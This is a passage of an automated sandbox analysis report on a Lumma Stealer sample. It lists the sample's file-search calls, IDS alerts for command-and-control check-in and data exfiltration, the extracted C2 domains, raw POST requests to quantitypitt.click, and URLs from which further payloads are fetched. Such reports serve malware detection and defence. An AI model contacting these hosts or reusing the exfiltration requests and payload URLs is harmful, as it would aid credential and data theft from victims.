                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_00E1A570
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose,12_2_00E166DC
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00DDC622 FindFirstFileExW,12_2_00DDC622
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_00E173D4
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E17333 FindFirstFileW,FindClose,12_2_00E17333
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\124531Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49775 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49805 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49816 -> 172.67.186.189:443
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: quantitypitt.click
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Joe Sandbox ViewIP Address: 194.58.112.174 194.58.112.174
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49766 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49788 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49794 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49816 -> 172.67.186.189:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49823 -> 194.58.112.174:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49846 -> 172.67.191.144:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 172.67.186.189:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=84ORA7LFCGFL3SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LU8PHT2JI4GEGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15052Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5KF09NDH3SOHEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20536Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I8UMLDHAE16NIWXO8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3805Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1253Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FGTA4F6GQKZXWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 557508Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1D889 InternetReadFile,SetEvent,GetLastError,SetEvent,12_2_00E1D889
                Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
                Source: global trafficDNS traffic detected: DNS query: qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv
                Source: global trafficDNS traffic detected: DNS query: quantitypitt.click
                Source: global trafficDNS traffic detected: DNS query: neqi.shop
                Source: global trafficDNS traffic detected: DNS query: kliptizq.shop
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 22:29:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgdMo%2FlmiMzguYF8JZyhNWcTi89c88o1%2Bxx3atAqJuRbSNIAUJ3foY4pQ7w8AnjSO7rsN4Tps3gOs3BUEyHqAQQ7z6Ss0U8XRvTOlGWW%2B3PRN98EcFEj73DLNHJJMpRX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f638cc2ab095e5f-EWR
                Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
                Source: Setup.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: Setup.exeString found in binary or memory: http://ocsp.digicert.com0X
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: Setup.exeString found in binary or memory: http://ocsps.ssl.com0
                Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000000.2130438108.0000000000E75000.00000002.00000001.01000000.00000006.sdmp, Designing.com.2.dr, Brunette.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Setup.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/9
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/Z
                Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtC
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtM
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtge
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000002.2789843944.0000000001807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
                Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://neqi.shop/sdgjyut/psh.txtk
                Source: Designing.com, 0000000C.00000003.2535367064.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2558937419.00000000041DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/
                Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/%
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/api
                Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/apik
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click:443/api
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click:443/apiK
                Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click:443/apiicrosoft
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
                Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
                Source: powershell.exe, 00000010.00000002.2796376802.0000000000980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingmance
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
                Source: powershell.exe, 00000010.00000002.2797712554.0000000004B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: powershell.exe, 00000010.00000002.2796253872.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796376802.000000000094B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2796883993.0000000000BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Designing.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Designing.com, 0000000C.00000003.2535014422.0000000005EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Setup.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
